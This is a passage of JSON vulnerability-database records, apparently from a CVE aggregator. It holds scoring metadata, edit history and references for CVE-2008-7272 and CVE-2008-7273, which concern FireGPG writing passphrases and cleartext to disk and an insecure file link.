"key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "85fdbb6779c8f53457b03e4617cac1fd", "key": "extraReferences"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "immutableFields": [], "lastseen": "2021-02-02T05:35:21", "modified": "2019-11-20T15:56:00", "objectVersion": "1.5", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 78}, "different_elements": ["cpeConfiguration"], "edition": 8, "lastseen": "2021-02-02T05:35:21"}], "edition": 9, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "2323c5f10ea99bff6a3fd88adbf7723c"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "b37293c28011cded7e6cea212cc908fa"}, {"key": "cvelist", "hash": "9c6958cd5dd022a438c0a93346bb7717"}, {"key": "cvss", "hash": "6f6410364e4cee78bd47ed1fc3d8dd5b"}, {"key": "cvss2", "hash": "a6adb76bd2d2e833d4aee455da4b36c3"}, {"key": "cvss3", "hash": "beb519effad5780952ea4ce1697a49ad"}, {"key": "cwe", "hash": "c92f044c94e4360fec268c45081f3bc6"}, {"key": "description", "hash": "f427291f843f1948956af8f0777cb86f"}, {"key": "extraReferences", "hash": "85fdbb6779c8f53457b03e4617cac1fd"}, {"key": "href", "hash": "b066b40875680d07f9f9912048360029"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "368a4092894f1320c5eb8d6f1746c872"}, {"key": "published", "hash": "d1c394bb6e6939e65900ac8652bcb35f"}, {"key": "references", "hash": "d613e2c86955266b0d3e0b9be74eae16"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "5a3d95049ed4485340188fd46566963d"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "d695debc34a1657f10acd9dd2989cff4ec01e7bd03c81d546ca7db279f9ade48", "viewCount": 85, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-21T20:41:43", "rev": 2}, "score": {"value": 1.2, "vector": "NONE", "modified": "2021-04-21T20:41:43", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": [], "cwe": ["CWE-59"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://www.openwall.com/lists/oss-security/2011/01/14/2", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://www.openwall.com/lists/oss-security/2011/01/14/2"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://security-tracker.debian.org/tracker/CVE-2008-7273", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7273"}], "immutableFields": []}, {"id": "CVE-2008-7272", "bulletinFamily": "NVD", "title": "CVE-2008-7272", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "published": "2019-11-08T00:15:00", "modified": "2020-02-10T21:16:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "reporter": "cve@mitre.org", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "cvelist": ["CVE-2008-7272"], "type": "cve", "lastseen": "2021-04-21T20:41:43", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T13:59:22", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T13:59:22", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "f6701a04d3477e440e72324b648d7646a2f9466e07e83e341707bb314aec84a0", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "a0acab3127efc281e78e28b6a414532c", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-09-21T13:59:22", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 10}, "differentElements": ["cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T13:59:22"}, {"bulletin": {"affectedSoftware": [{"name": "getfiregpg firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-11T14:25:16", "references": [], "rev": 2}, "score": {"modified": "2020-02-11T14:25:16", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "a5439a88032d0d96d6b3b175c5bb2652a08a5ac9dd8565abd675e989e312c52e", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "c78a0c9b48c95bd2d49fb402de9ce674", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "d2db9f7acf8121ca4d72b70e2934db08", "key": "affectedSoftware"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-02-11T14:25:16", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 10}, "differentElements": ["cvss3", "cpe", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-11T14:25:16"}, {"bulletin": {"affectedSoftware": [{"name": "getfiregpg firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user?s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users?s private key.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-11-15T19:55:37", "references": []}, "score": {"modified": "2019-11-15T19:55:37", "value": 2.4, "vector": "NONE"}}, "hash": "05a389bab8cb239109f07a53e4f0a9c76cc24d31548b23dfad15c1385b48f5a5", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "b0552313c96be75e9ec1c10adb56b096", "key": "modified"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "240c2c1dd6f5cc5cbeb07774547c6c2b", "key": "description"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "c78a0c9b48c95bd2d49fb402de9ce674", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "d2db9f7acf8121ca4d72b70e2934db08", "key": "affectedSoftware"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2019-11-15T19:55:37", "modified": "2019-11-14T14:28:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 2}, "differentElements": ["description", "modified"], "edition": 2, "lastseen": "2019-11-15T19:55:37"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "enchantments": {"dependencies": {"modified": "2021-02-02T05:35:21", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T05:35:21", "rev": 2, "value": 2.4, "vector": "NONE"}}, "extraReferences": [{"name": "https://security-tracker.debian.org/tracker/CVE-2008-7272", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7272"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "refsource": "MISC", "tags": ["Third Party Advisory", "Issue Tracking"], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386"}], "hash": "feff88852d5f44ef4f736cb629de97022a0e3f23b99e0deec3d9ee5daaa7d8df", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "4847e3110691b6a6a4c7664c0f127f70", "key": "extraReferences"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "675695b80d1f3d2196a77047e1ceba64", "key": "cpeConfiguration"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "a0acab3127efc281e78e28b6a414532c", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "immutableFields": [], "lastseen": "2021-02-02T05:35:21", "modified": "2020-02-10T21:16:00", "objectVersion": "1.5", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 19}, "different_elements": ["cpeConfiguration"], "edition": 8, "lastseen": "2021-02-02T05:35:21"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "*"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 6, "enchantments": {"dependencies": {"modified": "2020-11-29T22:56:16", "references": [], "rev": 2}, "score": {"modified": "2020-11-29T22:56:16", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "20ae55db346f6babbeac989b07a5b26e855e45e42cfda6773d64bbcb84e4ef79", "hashmap": [{"hash": "d647e62c83e294ffd6f56a7c761beece", "key": "affectedSoftware"}, {"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "675695b80d1f3d2196a77047e1ceba64", "key": "cpeConfiguration"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-11-29T22:56:16", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 15}, "differentElements": ["affectedSoftware"], "edition": 6, "lastseen": "2020-11-29T22:56:16"}], "edition": 9, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "a0acab3127efc281e78e28b6a414532c"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "77e03828e2d6f83f8fa932acfe8daff3"}, {"key": "cvelist", "hash": "767e67f900c3effb5b550959d21fb12e"}, {"key": "cvss", "hash": "a89198c45ce87f7ec9735a085150b708"}, {"key": "cvss2", "hash": "9bc143c7676b7e5a3fd9537d7507310b"}, {"key": "cvss3", "hash": "cd391b15e7a01ae2bbfcca256d89bfb8"}, {"key": "cwe", "hash": "92c16862fafe4d9eb26185434339836e"}, {"key": "description", "hash": "95669953499c0eb40b242611dfbe75d4"}, {"key": "extraReferences", "hash": "4847e3110691b6a6a4c7664c0f127f70"}, {"key": "href", "hash": "9258b012e591cc93a7c6b0cd1b5c6b05"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "3c75b36a7f1966a251dbe6148b866f97"}, {"key": "published", "hash": "1162e82aa1c980ee7ebee4af4c99369c"}, {"key": "references", "hash": "54b0c94164bf625d039c58f14cd4c116"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "5db042f8057f3f288fe9cd4213121eb2"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "f34f5d089606f7d870ccc28642bf61f774619d905673726848fc15f3a6590575", "viewCount": 25, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-21T20:41:43", "rev": 2}, "score": {"value": 2.4, "vector": "NONE", "modified": "2021-04-21T20:41:43", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": 